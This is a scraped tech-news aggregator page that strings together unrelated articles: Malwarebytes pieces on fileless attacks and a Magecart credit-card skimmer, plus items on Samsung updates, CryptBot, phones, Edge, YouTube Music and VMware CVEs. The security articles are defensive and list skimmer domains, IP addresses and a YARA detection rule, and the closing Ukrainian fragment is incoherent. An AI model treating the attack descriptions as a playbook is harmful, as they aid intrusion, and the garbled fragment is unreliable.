How attackers evade traditional AV and how to stop them

andreasc
-
0
How attackers evade traditional AV and how to stop them
[ad_1]

Find threats camouflaging themselves in RAM.

When you hear about malware, there’s a good chance you think of sketchy executables or files with extensions like .DOCX or .PDF that, once opened, execute malicious code. These are examples of file-based attacks—and while they can be bad, they’re nothing compared to their fileless cousins.

As the name suggests, fileless attacks don’t rely on traditional executable files to get the job done but rather in-memory execution, which helps them evade detection by conventional security solutions.

In this post, we’ll explore topics like how fileless attacks work, why they’re effective, and what you can do to find and block fileless threats.

Fileless attacks explained

In contrast to file-based attacks that execute the payload in the hard drive, fileless attacks execute the payload in Random Access Memory (RAM). Executing malicious code directly into memory instead of the hard drive has several benefits, such as:

  • Evasion of traditional security measures: Fileless attacks bypass antivirus software and file signature detection, making them difficult to identify using conventional security tools.   
  • Increased potential for damage: Since fileless attacks can operate more stealthily and with greater access to system resources, they may be able to cause more damage to a compromised system than file-based attacks.

  • Memory-based attacks can be difficult to remediate: Since fileless attacks don’t create files, they can be more challenging to remove from a system once they have been detected. This can make it extra difficult for forensics to trace an attack back to the source and restore the system to a secure state.

Fileless attacks vs Living-off-the-land (LOTL) attacks

If you read our article on LOTL attacks, you may be confused: Aren’t fileless attacks and LOTL attacks the same thing? Well, yes and no.

LOTL attacks are anytime an attacker leverages legitimate tools to evade detection, steal data, and more, while fileless attacks refer purely to executing code directly into memory. While both types of attacks often overlap, they are not synonymous.

Think of fileless attacks as an occasional subset of LOTL attacks. Fileless attacks can and often do leverage LOTL techniques to execute payload into memory, but they can also do so without leveraging a legitimate system tool or process at all.

PowerShell script extracted from a Microsoft Word document. If macros are enabled, it would execute the code in memory upon being opened. Source.

For example, an attacker can use PowerShell to download and execute a malicious payload directly in memory, without writing it to the disk. In this case, the attack is both LOTL (since PowerShell is a legitimate tool) and fileless (as the payload is executed in memory).

On the other hand, an attacker injecting malicious JavaScript into a website can exploit browser vulnerabilities and execute payloads in memory. This fileless attack executes code without writing to the hard drive, but doesn’t qualify as LOTL as it doesn’t use a legitimate system tool or process.

5 different ways fileless attacks execute code in memory

Once an attacker gains access through phishing or exploiting vulnerabilities, they can execute malicious code in memory using several methods, some of which may overlap with LOTL techniques.

Below are five common techniques used in fileless attacks:

  • PowerShell: A legitimate scripting that can execute malicious code directly in memory. As mentioned earlier, this technique overlaps with LOTL attacks as it leverages a built-in system tool.
  • Process hollowing: Process hollowing is a fileless technique where attackers create a new process in a suspended state, replace its memory content with malicious code, and then resume the process. The malicious code executes in memory without writing to the disk.
  • Reflective DLL injection: In this fileless attack, attackers load a malicious Dynamic Link Library (DLL) into a legitimate process’s memory without writing it to the disk. The DLL is executed directly in memory, evading detection by traditional security software.
  • JavaScript and VBScript: Fileless attackers can use JavaScript or VBScript to run malicious code directly in memory within a web browser or other applications that support these scripting languages.
  • Microsoft Office macros: Fileless attackers can use malicious macros embedded in Microsoft Office documents to execute code in memory when the document is opened. This method takes advantage of the legitimate macro functionality, making it an example of an LOTL technique as well.

Note that fileless attacks often rely on exploiting vulnerabilities in system components in each of these instances (such as Office or web-browsers) to execute their code. 

Preventing and spotting fileless attacks: Quick tips

Prevention Method Description
Keep software and systems updated Regularly update your operating systems, applications, and security software to patch vulnerabilities that could be exploited by fileless attackers.
Regularly review security logs Examine security logs for unusual activity or patterns that could indicate a fileless attack, such as unexpected PowerShell usage or excessive network connections.
Employ behavioral analytics Use advanced threat detection tools that employ behavioral analytics to identify and block fileless attacks based on their unique behavior patterns.
Restrict macro usage Limit the use of Microsoft Office macros by disabling them or allowing only digitally signed and trusted macros.

Malwarebytes EDR and Exploit Protection: Safeguarding against fileless attacks

Malwarebytes Exploit Protection can effectively block many fileless attacks by monitoring and reinforcing application behavior, hardening applications, and ensuring advanced memory protection.

To configure Exploit Protection Advanced settings, follow these steps:

Exploit Protection settings in a policy in Malwarebytes EDR.

Here’s an overview of the protection layers offered by Malwarebytes EDR Exploit Protection:

  • Application Hardening: By enforcing security measures like DEP and ASLR, and disabling potentially vulnerable components like Internet Explorer VB Scripting, Application Hardening reduces the attack surface and makes it more difficult for fileless malware to exploit weaknesses in applications.
  • Advanced Memory Protection: This layer prevents fileless malware from executing payload code in memory by detecting and blocking techniques such as DEP bypass, memory patch hijacking, and stack pivoting, thereby stopping the attack before it can cause harm.
  • Application Behavior Protection: This layer also detects and blocks exploits that do not rely on memory corruption, such as Java sandbox escapes or application design abuse exploits. Options include Malicious LoadLibrary Protection, Protection for Internet Explorer VB Scripting, Protection for MessageBox Payload, and protection against various Microsoft Office macro exploits. 
  • Java Protection: These settings protect against exploits commonly used in Java programs. By guarding against Java-specific exploits, such as web-based Java command execution and Java Meterpreter payloads, Java Protection can effectively prevent fileless attacks that leverage Java vulnerabilities to infiltrate systems and execute malicious code.

Fighting fileless threats with Malwarebytes EDR: Configuring Suspicious Activity Monitoring in Nebula

Malwarebytes Endpoint Detection and Response (EDR) offers an effective solution to detect and mitigate fileless malware threats by monitoring potentially malicious behavior on endpoints. The Suspicious Activity Monitoring feature in Nebula uses machine learning models and cloud-based analysis to detect questionable activities. In this section, we will outline how to configure Suspicious Activity Monitoring in Nebula.

To enable Suspicious Activity Monitoring in your policy:

  • Log in to your Nebula console.
  • Navigate to Configure > Policies.
  • Click “New” or select an existing policy.
  • Choose the “Endpoint Detection and Response” tab.
  • Locate “Suspicious Activity Monitoring” and enable it for the desired operating systems.

Suspicious Activity monitoring detections in Nebula showing a possible fileless attack. On the right, we see the command line context for this process in our organization.

Advanced Settings offer additional options for activity monitoring. To configure these settings:

  • In the same “Endpoint Detection and Response” tab, find the “Advanced Settings” section.
  • Enable “Server operating system monitoring for suspicious activity” to extend monitoring to server operating systems. 
  • Enable “Very aggressive detection mode” to apply a tighter threshold for flagging processes as suspicious. 
  • Toggle “Collect networking events to include in searching” to ON (default) or OFF, depending on your preference. Turning it OFF decreases traffic sent to the cloud.

Flight Recorder Search

Flight Recorder Search collects all endpoint events within its search functionality. By configuring Suspicious Activity Monitoring in Malwarebytes EDR through the Nebula platform, you can effectively counter fileless malware threats by monitoring processes, registry, file system, and network activity on the endpoint. 

Respond to fileless attacks quickly and effectively

Managed Detection and Response (MDR) services provide an attractive option for organizations without the expertise to manage EDR solutions. MDR services offer access to experienced security analysts who can monitor and respond to threats 24/7, detect and respond to fileless attacks quickly and effectively, and provide ongoing tuning and optimization of EDR solutions to ensure maximum protection. 

Stop fileless attacks today


[ad_2]
Source link

Samsung is already rolling out May 2023 update to Galaxy devices

andreasc
-
0
Samsung is already rolling out May 2023 update to Galaxy devices
[ad_1]

Samsung has made it a habit of releasing the latest monthly security patches way ahead of schedule. It often starts pushing a new security update several days before we hit the new month. The Korean behemoth has done it again. It has begun seeding the May 2023 Android security patch to its Galaxy devices. But unlike most past instances, the company is starting with an entry-level model this time around. The Galaxy A10e is picking up the May SMR (Security Maintenance Release) ahead of flagship models.

The May update for the Galaxy A10e is currently available for users in Samsung’s home country South Korea. The rollout began earlier this week with the firmware build number A102NKOS3CWD1, SamMobile reports. Since May is still a few days away, we don’t have details of the patch. It’s unclear which vulnerabilities have been fixed with the latest monthly security release for Android devices. As usual, there should be several dozen fixes here, including a few Galaxy-specific ones coming directly from Samsung.

Don’t expect anything apart from the latest security fixes, though. Samsung launched the Galaxy A10e in July 2019. The entry-level smartphone is now in its last legs (fourth year in the market). It stopped receiving major Android updates since Android 11 and will soon stop getting security patches too. The May SMR could be the penultimate update for it. The 2019 handset isn’t covered under the Korean firm’s extended update policy that promises five years of security updates for Galaxy devices.

Nonetheless, if you’re using the Galaxy A10e, you may receive the May update sooner or later. It’s not guaranteed, though. Samsung may not push the May SMR to this phone outside of South Korea. The US version recently received the April update (firmware version A102USQSFCWC3 for carrier-locked units and A102U1UESFCWD1 for unlocked units), which never reached the company’s homeland. It may now skip the May release in other markets. As usual, you can check for new updates from the Settings app on your phone.

Samsung will soon release the May update for other Galaxy devices

The Galaxy A10e may not get the May update everywhere but Samsung will soon release the latest SMR for other Galaxy devices. Despite beginning with a budget handset, flagship models should still get the priority once it starts a wider rollout. The Galaxy S23 series should sit high on this priority list, though not necessarily at the top. We will let you know as and when these updates come.


[ad_2]
Source link

Google takes legal action to take down CryptBot malware

andreasc
-
0
Google takes legal action to take down CryptBot malware
[ad_1]

It’s no secret that over the past few years, threat actors have become more sophisticated in their efforts to scam people of their hard-earned money and steal personal information. One of the methods which the threat actors have recently been using to infiltrate systems is the CryptBot malware. This malicious software steals sensitive information such as passwords, cookies, and credit card information and sells it to other malware makers and distributors. However, Google has finally taken action and disrupted the malware’s infrastructure and distributors.

In the blog post announcing the decision, Google revealed that the CryptBot malware, which spread through malicious apps such as a fake Google Chrome and Google Earth Pro, infected around 670,000 computers last year, compromising users’ personal information and selling it for data breach campaigns. However, Google’s recent action will help prevent new infections and slow the malware’s growth.

“Lawsuits have the effect of establishing both legal precedents and putting those profiting, and others who are in the same criminal ecosystem, under scrutiny. This litigation is another step forward in holding cybercriminals accountable, by not just targeting those that operate botnets, but also those that profit from malware distribution,” reads the company’s blog post.

How did Google take down the malware?

Google’s actions against the malware came after the company identified the malware’s Pakistan-based distributors with the help of its Threat Analysis Group (TAG) and took legal action against them. Google filed a legal complaint against many major CryptBot distributors and secured a temporary court order to hamper the developers’ ability to spread the malware. With the order, Google was able to take down the current and future domains linked to the distribution of the malware.

While Google’s action against the malware distributors is commendable, considering its brand identity was at stake, the incident highlights the need for users to take necessary precautions while browsing the web. These include downloading apps and software from credible sources, keeping operating systems up to date, and installing antivirus software.


[ad_2]
Source link

Magecart threat actor rolls out convincing modal forms

andreasc
-
0
Magecart threat actor rolls out convincing modal forms
[ad_1]

It’s hard to put individuals at fault when the malicious copy is better than the original. This credit card skimmer was built to fool just about anyone.

To ensnare new victims, criminals will often devise schemes that attempt to look as realistic as possible. Having said that, it is not every day that we see the fraudulent copy exceed the original piece.

While following up on an ongoing Magecart credit card skimmer campaign, we were almost fooled by a payment form that looked so well done we thought it was real. The threat actor used original logos from the compromised store and customized a web element known as a modal to perfectly hijack the checkout page.

While the technique to insert frames or layers is not new, the remarkable thing here is that the skimmer looks more authentic than the original payment page. We were able to observe several more compromised sites with the same pattern of using a custom-made and fraudulent modal.

This skimmer and associated campaigns represent one of the most active Magecart attacks we have been tracking in recent months.

Smooth checkout 

We identified a compromised online website for a Parisian travel accessory store running on the PrestaShop CMS. A skimmer we previously identified as Kritec, was injected and loading malicious JavaScript that altered the checkout process. In the following section, we will compare the checkout process when the skimmer is active and when it is not.

Fraudulent payment form

What we see here is the use of a ‘modal‘ which is a web page element displayed in front of the current active page. The modal disables and grays out the background so that the user can focus on the presented element instead. This is an elegant way for website owners to keep their customers on the same web site and have them interact with another form.

Figure 1: Compromised store loads fake payment modal

The problem is that this modal is entirely fake and designed to steal credit card data. It may sound hard to believe given everything matches to the original brand and feel of the site. Before digging further into why it is fraudulent, we will take a look at the same online store when the skimmer has been disabled.

Actual (real) payment form

In order to view this legitimate sequence, we first had to block the skimmer when requesting the e-commerce page. In our case, we simply blocked the connection to the malicious domain where the skimmer is hosted. As a result, the website will display what the original payment form should be (prior to the compromise).

Figure 2: Legitimate payment form when same store is not compromised

The actual payment flow for this merchant is to redirect users to a third-party processor hosted by Dalenys, now part of Payplug, a French payment solutions company. So rather than display a modal, it loads the webpage for the payment processor to allow the user to enter their banking information. Once that is validated, it will take them back to the merchant page.

Malicious modal

The malicious modal is built very cleanly and contains an animation that displays the store’s logo in the middle and then moves it back up. We have to give credit where credit is due: this is a very well done skimmer that is actually a smoother user experience than the store’s default. We should also note that the malware author is not only well versed in web design, they also use proper language (French) for each form field.

Figure 3: A closer look at the fake modal

However, we noticed a small mistake in the hyperlink for Politique de confidentialité (terms of use). That link redirects to the terms of use for Mercardo Pago, a payment processor used in South America. It is likely the threat actor copied the data from a previous template and did not notice their mistake. This is just a detail, and does not affect the functionality of the skimmer at all.

We can try to look for this erroneous hyperlink within the skimmer source code in order to confirm that the modal was created by the threat actor. The skimmer is rather complex and heavily obfuscated but we can see that HTML content is generated dynamically and goes through a decodeURIComponent routine.

Figure 4: Extracting code from the skimmer to reveal connection with the modal

If we step through the code until the modal is loaded, we can grabbing the Base64 value corresponding to the HTML content. One we have it, we can convert it to plain text and finally see the reference to mercadopago, that is proof that the skimmer is the one rendering this beautiful modal. In fact, we can see the whole thing is an iframe called v.ECPay:

Figure 5: The iframe created by the skimmer to display the modal

Full payment flow

We recreated the payment flow from the perspective of a customer shopping via that compromised store. We can see that upon selecting the credit card payment option, the malicious modal is loaded and will harvest their payment card details.

A fake error is then displayed briefly “votre paiment a été annulé” (your payment was cancelled) before the user is redirected to the real payment URL:

Figure 6: Payment process flow with the skimmer active

On the second attempt, the payment will go through and victims will be unaware of what just happened.

The skimmer will drop a cookie which will serve as an indication that the current session is now marked as completed. If the user was to go back and attempt the payment again, the malicious modal would no longer be displayed (instead the real payment method by the external processor Dalenys will be used).

Figure 7: Cookie dropped by skimmer once data has been stolen

Ongoing, covert campaigns

We now believe this Kritec skimmer is part of the same compromises with injections into vulnerable websites where malicious code is placed within the Google Tag Manager script. It is possible multiple threat actors are involved in those campaigns and customizing skimmers accordingly.

While many hacked stores had a generic skimmer, it appears the custom modals were developed fairly recently, maybe a month or two ago. The threat actor is using different domains to host the skimmer but names them in a similar way: [name of store]-loader.js.

We crawled several thousand e-commerce sites and found more fraudulent modals, in different languages.

Figure 8: A Dutch e-commerce site with the fake modal

Figure 9: A Finnish e-commerce site with the fake modal

Discerning whether an online store is trustworthy has become very difficult and this case is a good example of a skimmer that would not raise any suspicion.

If you are a Malwarebytes customer, you will get a notification and block when attempting to make a purchase from a store that has been compromised by this skimmer.

Figure 10: Skimmer being blocked by Malwarebytes

Indicators of Compromise

Domain names

genlytec[.]us
shumtech[.]shop
zapolmob[.]sbs
daichetmob[.]sbs
interytec[.]shop
pyatiticdigt[.]shop
stacstocuh[.]quest

IP addresses

195.242.110[.]172
195.242.110[.]83
195.242.111[.]146
45.88.3[.]201
45.88.3[.]63

YARA rule

rule kritecloader
{
 strings:
     $string = "'fetchModul'"
     $string2 = "'setAttribu'"
     $string3 = "'contentWin'"
     $string4 = "'zIndex'"
condition:
    all of them
}

Whether you are visiting an online store from home or while at work, web protection is a critical layer in your overall defense. Malwarebytes Premium for consumers and Endpoint Protection for businesses provide real-time protection against threats like Magecart.

TRY NOW


[ad_2]
Source link

Apple iPhone 14 Pro Max vs Xiaomi 13 Ultra

andreasc
-
0
Apple iPhone 14 Pro Max vs Xiaomi 13 Ultra
[ad_1]

The Xiaomi 13 Ultra is one of the hottest new phones on the market. In this article, we’ll compare it with the best Apple has to offer. We’ll compare the Apple iPhone 14 Pro Max vs Xiaomi 13 Ultra. These two smartphones are both great, but in entirely different ways, as they’re quite different. That not only applies to their designs, but everything in between, pretty much. So, there’s a lot to talk about here.

We’ll kick things off by listing their specifications, and will then move to a number of other categories. You’ll get to see their designs compared, and the same goes for their displays, performance, battery life, cameras, and audio performance. Having said that, let’s get this party on the road, shall we?

Specs

Apple iPhone 14 Pro MaxXiaomi 13 Ultra
Screen size6.7-inch LTPO Super Retina XDR OLED display (flat, 120Hz refresh rate, 200 nits peak brightness)6.73-inch QHD+ LTPO AMOLED display (curved, 120Hz adaptive refresh rate, 2,600 nits peak brightness)
Screen resolution2796 x 12903120 x 1440
SoCApple A16 BionicQualcomm Snapdragon 8 Gen 2
RAM6GB12GB (LPDDR5X)
Storage128GB, 256GB, 512GB, 1TB, non-expandable256GB/512GB, non-expandable (UFS 4.0)
Rear cameras48MP (f/1.8 aperture, wide-angle, 1.22um pixel size, sensor-shift OIS, dual pixel PDAF)
12MP (ultrawide, f/2.2 aperture, 13mm, 120-degree FoV, 1.4um pixel size, dual pixel PDAF)
12MP (telephoto, f/2.8 aperture, 77mm lens, PDAF, OIS, 3x optical zoom)		50.3MP (Sony’s IMX989 1-inch sensor, f/1.9-f/4.0 aperture, 23mm lens, 1.6um pixel size, multi-directional PDAF, Laser AF, OIS)
50MP (ultrawide, 122-degree FoV, f/1.8 aperture, 12mm lens, dual-pixel PDAF)
50 MP (telephoto, f/1.8 aperture, 75mm lens, 3.2x optical zoom, dual-pixel PDAF)
50MP (periscope telephoto, 5x optical zoom, dual-pixel PDAF, OIS, 120mm lens)
Front cameras12MP (wide-angle, f/1.9 aperture, 23mm lens, PDAF)
SL 3D (depth/biometrics sensor)		32MP (wide angle)
Battery4,323mAh, non-removable, 23W wired charging, 15W MagSafe wireless charging, 7.5W Qi wireless charging, 5W reverse wireless charging
Charger not included		5,000mAh, non-removable, 90W wired charging, 50W wireless charging, 10W reverse wireless charging
Charger included
Dimensions160.7 x 77.6 x 7.9mm163.2 x 74.6 x 9.1mm
Weight240 grams227 grams
Connectivity5G, LTE, NFC, Bluetooth 5.3, Wi-Fi, Lightning port5G, LTE, NFC, Bluetooth 5.3, Wi-Fi, USB Type-C
SecurityAdvanced facial scanningIn-display fingerprint scanner (optical)
OSiOS 16Android 13
MIUI 14
Price$1,099CNY5,999 ($872)+
BuyAppleChina only for now

Apple iPhone 14 Pro Max vs Xiaomi 13 Ultra: Design

These two devices do look considerably different no matter what side you’re looking at them. They also feel entirely different in the hand. The iPhone 14 Pro Max is made out of metal and glass. The Xiaomi 13 Ultra, on the other hand, is made out of metal, with a layer of vegan leather on the back. That vegan leather does not cover the entirety of the backplate, even though it does cover most of it. It does not curve into the frame on the sides, though, that frame extends to the back, to a degree. It’s kind of difficult to explain. The upper portion of the phone’s back side is also higher than the bottom one. The backplate gradually increases in thickness to make the camera bump less pronounced.

The Xiaomi 13 Ultra is slightly taller than the iPhone 14 Pro Max, while it’s noticeably narrower. It’s also thicker than iPhone’s offering. The iPhone 14 Pro Max is 13 grams heavier, though both of these phones are quite hefty in the hand. They do have flat sides too. The flat surface on the iPhone 14 Pro Max definitely does take more space than on the Xiaomi 13 Ultra, as far as their sides are concerned. The Xiaomi 13 Ultra is a lot less slippery in comparison, and it also cuts into your hand less when you hold it. That’s a combination of the design and the fact it’s lighter than the iPhone 14 Pro Max.

AH Xiaomi 13 Ultra image 9

Apple’s handset has a pill-shaped cutout on the front, and uniform bezels. The Xiaomi 13 Ultra has extremely thin bezels, and a display camera hole. The iPhone 14 Pro Max has a flat display, while Xiaomi’s flagship offers a curved one. When we flip the two phones around, even more differences are noticeable. Apple’s handset has three cameras on the back, organized in a camera island placed in the top-left corner. The Xiaomi 13 Ultra has a huge camera bump on the back, with four cameras included inside it. That camera bump is centered in the upper portion of the phone’s backplate. Both phones do feel premium in the hand, and both are IP68 certified for water and dust resistance.

Apple iPhone 14 Pro Max vs Xiaomi 13 Ultra: Display

The iPhone 14 Pro Max has a 6.7-inch 2796 x 1290 LTPO Super Retina XDR OLED display. This panel has a 120Hz refresh rate, which is adaptive. It supports HDR10 content, and it also comes with Dolby Vision support. We’re looking at a 19.5:9 aspect ratio here, while this display goes up to 2,000 nits of brightness at its peak. This panel is protected by the Ceramic Shield glass, and it’s flat.

The Xiaomi 13 Ultra, on the flip side, includes a 6.73-inch QHD+ (3200 x 1440) LTPO AMOLED display. This panel is curved, and it can project up to 1 billion colors. It supports HDR10+ content, and also comes with Dolby Vision support. It has a 20:9 display aspect ratio, and it can get immensely bright at 2,600 nits of peak brightness. This panel is protected by the Gorilla Glass Victus.

Let me just say that both of these displays are fantastic, to say the least. These are some of the best panels on the market. They’re bright, vivid, sharp, and offer great viewing angles. The blacks are deep, and the touch response is really good. The Xiaomi 13 Ultra’s panel does look a bit better on paper, but that’s, for the most part, not the difference you’ll notice. Both panels do get extremely bright outdoors, and both will be more than sufficient to use in bright daylight, even under direct sunlight. These panels are outstanding.

Apple iPhone 14 Pro Max vs Xiaomi 13 Ultra: Performance

Apple’s flagship is fueled by the Apple A16 Bionic SoC, while the phone comes with 6GB of RAM and NVMe storage. The Xiaomi 13 Ultra, on the other hand, is fueled by the Snapdragon 8 Gen 2 processor. It includes up to 16GB of LPDDR5X RAM and UFS 4.0 flash storage. These two processors are basically the best two mobile SoCs on the market at the moment. When it comes to RAM and storage, Xiaomi’s handset is more powerful.

What is the performance like, though? Well, outstanding, in both cases. These two phones do come with significantly different software builds, and software experiences, but the general performance, in terms of fluidity, it’s great. Both phones are buttery smooth regardless of how you’re using them. That goes for regular everyday tasks, and even gaming. Even the most demanding games on their respective app stores cannot slow down these two phones, they’re that great in terms of performance. So, that’s not something you have to worry about.

Apple iPhone 14 Pro Max vs Xiaomi 13 Ultra: Battery

The iPhone 14 Pro Max packs in a 4,323mAh battery. The Xiaomi 13 Ultra, on the other hand, has a 5,000mAh battery on the inside. Do note that iPhones need less battery capacity to deliver similar battery life due to different software. In any case, both of these smartphones do offer great battery life. They’ll last until the end of the day for the vast majority of you. Gaming and similar tasks can, of course, affect battery life more.

Reaching the 8-hour screen-on-time mark on the Xiaomi 13 Ultra is not a problem at all. I was able to get there most days, or would have been able to if I used the phone as much. I was even left with some battery life in the tank at that point. The iPhone 14 Pro Max did not do as great at launch, but things improved with updates. It can now also go over that point, and offers every better results at times. They’re mostly on the same playing field in terms of battery life, though.

Charging is another story entirely. The Xiaomi 13 Ultra completely destroys the iPhone 14 Pro Max in that regard. Xiaomi’s flagship not only supports 90W wired, 50W wireless, and 10W reverse wireless charging, but it also packs in a 90W charger in the box. The iPhone 14 Pro Max supports 20W wired, 15W MagSafe wireless, and 7.5W Qi wireless charging, and it does not offer a charger in the box.

Apple iPhone 14 Pro Max vs Xiaomi 13 Ultra: Cameras

The iPhone 14 Pro Max has three cameras on the back. A 48-megapixel main camera is backed by a 12-megapixel ultrawide unit (120-degree FoV), and a 12-megapixel telephoto camera (3x optical zoom). The Xiaomi 13 Ultra carries four 50-megapixel cameras on the back. It has a 50-megapixel main camera (1-inch sensor), a 50-megapixel ultrawide camera (122-degree FoV), a 50-megapixel telephoto unit (3.2x optical zoom), and a 50-megapixel periscope telephoto camera (5x optical zoom, 100x digital zoom). Xiaomi’s flagship also comes with Leica lenses, and some software too.

AH Xiaomi 13 Ultra image 19

These two devices produce rather different pictures. During the day, they’re both outstanding. The images from the iPhone tend to have a slightly warmer tone, but both results are very sharp, and detailed. The Xiaomi 13 Ultra does handle HDR situations a bit better, but only at times when the iPhone 14 Pro Max decides to mess up the white balance. That’s still an issue from time to time.

In low light, the Xiaomi 13 Ultra takes the cake. That is especially noticeable when you zoom into shots and see how much more detail that phone provides. I’m talking about the main camera, of course. Its sensor allows for way more light to enter the scene, and the software does a good job of balancing that, almost every time. The ultrawide camera performance is also better in low light, and the same goes for the telephoto camera. You’ll see more details across the board.

The iPhone 14 Pro Max still does an amazing job, though, and many people may actually prefer those results. When it comes to video recording, we’d give a slight advantage to Apple, even though the Xiaomi 13 Ultra is almost on par in that regard. It does a better job in low light, that’s for sure, which is especially noticeable when you’re panning around.

Audio

There is a set of stereo speakers on each of these two devices. Those speakers do a good job in both cases, but the Xiaomi 13 Ultra has the edge. The sound sounds a bit more detailed, and there’s also more bass here. These speakers also do get a bit louder.

What you will not find on either phone is an audio jack. You’ll have to use the Lightning port on the iPhone 14 Pro Max, and a Type-C port on the Xiaomi 13 Ultra if you’d like to achieve a wired audio connection. If you’d rather go wireless, Bluetooth 5.3 is available on both phones.


[ad_2]
Source link

Microsoft Edge is reportedly leaking users’ browsing data to Bing

andreasc
-
0
Microsoft Edge is reportedly leaking users’ browsing data to Bing
[ad_1]

Ever since the start of the AI revolution with the launch of ChatGPT and its subsequent integration into the Edge browser as the Bing AI chatbot, Microsoft has been striving to improve the service and provide a better browsing experience for its users. However, the latest version of Microsoft Edge has come under scrutiny as recent reports suggest the browser may be leaking users’ browsing data to Bing without their knowledge or consent.

The issue was first discovered by Reddit user hackermchackface, who noticed that the Edge browser sent a request to bingapis.com with the full URL of nearly every page they navigated to. Therefore, raising some serious privacy concerns.

The real cause behind the issue?

Although the Edge browser sending a request to Bing and leaking users’ browsing data was a privacy concern, upon further investigation, Rafael Rivera, a software engineer, found that the real culprit behind the issue was Edge’s new “follow” feature. He explained that the feature, which allows users to keep track of their favorite creators, such as their websites, YouTube channels, and other social media accounts, is somehow not functioning correctly and sending nearly every domain that a user visits to Bing.

Speaking on the concerns, Caitlin Roulston, director of communications at Microsoft, stated that they are aware of the reports and are investigating the issue. However, the company is yet to come out with an explanation as to why Edge was sending URLs to bingapis.com.

Disable Edge’s “follow” feature

Until Microsoft comes out with a solution to fix the issue, users should turn off the “follow” feature. To do this, head over to Settings > Privacy, Search, and Services > Services and click on the toggle for “Show suggestions to follow creators in Microsoft Edge.” This will prevent Edge from sending URLs to Bing, thus protecting users’ privacy.


[ad_2]
Source link

YouTube Music officially rolls out Podcasts in the U.S.

andreasc
-
0
YouTube Music officially rolls out Podcasts in the U.S.
[ad_1]
YouTube Music has officially launched a podcast feature for listeners in the United States, offering a new way for users to access their favorite shows and discover new ones. The feature is rolling out on the YouTube Music app, both on iOS and Android, and allows users to access a variety of podcasts across a range of genres. The announcement was made today via a YouTube Community post, making the feature official since it was reported that it was in testing phases back in February and announced to the media later that same month.

With the new podcast feature, YouTube Music is expanding its content offerings beyond music to include spoken-word content. This move is in line with the growing popularity of podcasts in recent years, as listeners seek out new forms of entertainment and information. By offering podcasts, YouTube Music hopes to attract more users to its platform and keep existing users engaged.The launch of podcasts on YouTube Music comes at a time when the podcast market is experiencing significant growth and the main YouTube app serving podcasts in the interim. As a listening experience that complements the podcast video experience on YouTube, this presents a significant opportunity for YouTube Music to tap into the growing demand for podcasts and expand its audience reach.
To access podcasts on YouTube Music, users simply need to search for their favorite shows or browse by category. New podcast recommendations and unfinished episodes will be accessible on the Home tab where you can filter by tapping “Podcasts” at the top of the home screen. The platform offers a range of categories, including: business, comedy, gaming, health & fitness, music, society & culture, and true crime. Users can also discover new shows through personalized recommendations based on their listening history and preferences.
Podcasts that were previously available in the main YouTube app will also be in YouTube Music, where they will be available on-demand, when offline, or while casting. You will also be able to effortlessly transition between the audio and video versions of a podcast, just as you can do now with music and music videos.

The podcast listening experience is different from the music listening experience on YouTube Music in that you do not need to have a Premium or Music Premium subscription in order to access some of the features. For those that are Premium subscribers, do note that the ad-free experience does not extend to host-read endorsements or sponsorship messages in podcasts.

As of right now, Podcasts on YouTube Music are only available in the United States. However, this may change in the future, according to the announcement. The feature is also rolling out gradually, so you may not see it in your YouTube Music app right away.


[ad_2]
Source link

Critical VMware Vulnerabilities Let Attackers Execute Code

andreasc
-
0
Critical VMware Vulnerabilities Let Attackers Execute Code
[ad_1]
VMware Vulnerabilitie

VMware Workstation, Workstation Pro, and Fusion have been subjected to several privately reported and fixed flaws. VMware has published a security advisory on the critical bugs discovered and their workarounds.

CVE(s):

  • CVE-2023-20869 – Stack-based buffer-overflow vulnerability in Bluetooth device-sharing functionality
  • CVE-2023-20870 – Information disclosure vulnerability in Bluetooth device-sharing functionality
  • CVE-2023-20871 – VMware Fusion Raw Disk local privilege escalation vulnerability
  • CVE-2023-20872 – Out-of-bounds read/write vulnerability

The severity of these CVEs varies from 7.1 to 9.3. However, VMware has released a patch for all the affected versions.

CVE-2023-20869 – Stack-based buffer-overflow vulnerability in Bluetooth device-sharing functionality

CVSS Score: 9.3

To exploit this, a threat actor must have local admin privileges on the virtual machine. Exploitation leads to the execution of code using VMware’s VMX process on the host machine.

Affected Products and Fixed Versions

CVE-2023-20870 – Information disclosure vulnerability in Bluetooth device-sharing functionality

CVSS Score: 7.1

To exploit this, a threat actor must have local admin privileges on the virtual machine. Exploitation leads to the reading of privileged information on VMware’s hypervisor memory used for isolating virtual machines from each other. This memory includes CPU utilization, OS on the virtual machine, memory utilization, and much more.

Affected Products and Fixed Versions

  • VMware Workstation Pro / Player (Workstation) – Fixed in 17.0.2
  • VMware Fusion – Fixed in 13.0.2

CVE-2023-20871 – VMware Fusion Raw Disk local privilege escalation vulnerability

CVSS Score: 7.3

To exploit this, a threat actor must have read/write access to the host machine. Exploitation leads to gaining root access to the host operating system.

Affected Products and Fixed Versions

  • VMware Fusion – Fixed in 13.0.2

CVE-2023-20872 – Out-of-bounds read/write vulnerability

CVSS Score: 7.1

To exploit this, a threat actor must have a virtual machine with a Physical CD/DVD drive attached and a SCSI controller configured with the host machine. Exploitation leads to the execution of code in VMware’s hypervisor memory from the virtual machine. The threat actor does not need local admin privilege for this vulnerability

Affected Products and Fixed Versions

  • VMware Workstation Pro / Player (Workstation) – Fixed in 17.0.1
  • VMware Fusion – Fixed in 13.0.1

For more information on these CVEs, please visit VMware’s security advisory.

Furthermore, two of these vulnerabilities (CVE-2023-20869, CVE-2023-20870) were initially discovered and reported by STAR Labs on the Pwn2Own 2023 held at Vancouver in March 2023. The reward provided for these zero days was $80,000.

Struggling to Apply The Security Patch in Your System? – 
Try All-in-One Patch Manager Plus

EHA

[ad_2]
Source link

Стартував Спільний Інформаційний Проєкт Укрінформу Та Медіа Центру Україна

andreasc
-
0

Після вибору членів комітету, учень подає їх список в Комісію з оцінювання випускних проектів, яка здійснює загальне керівництво й координацію загальношкільної роботи над проектами-портфоліо [319]. Прикладні (практико зорієнтовані) проекти, які розробляються учнями у процесі технологічної підготовки, відрізняє чітко визначений із початку результат діяльності його учасників, який враховує їхні соціальні та професійні інтереси. Такий проект потребує ретельно продуманої структури, сценарію діяльності його учасників із визначенням функцій кожного з них, чітких висновків, участі в оформленні результатів кінцевого продукту[там само]. 🔸 Війна відбувається не лише за територіальну цілісність, а й в інформаційному просторі.

  • Мешканці понад півсотні міст та столиць вийшли на вулиці, щоб підтримати Україну та доєднатися до телемарафону, 30 світових політичних лідерів звернулися до українців та міжнародної спільноти.
  • До виробництва контенту, окрім редакцій ДП “МПІУ”, залучені також медіагрупи “1+1”, Starlight Media та “Інтер Медіа Груп” (до липня 2022 року й медіагрупа “Україна”).
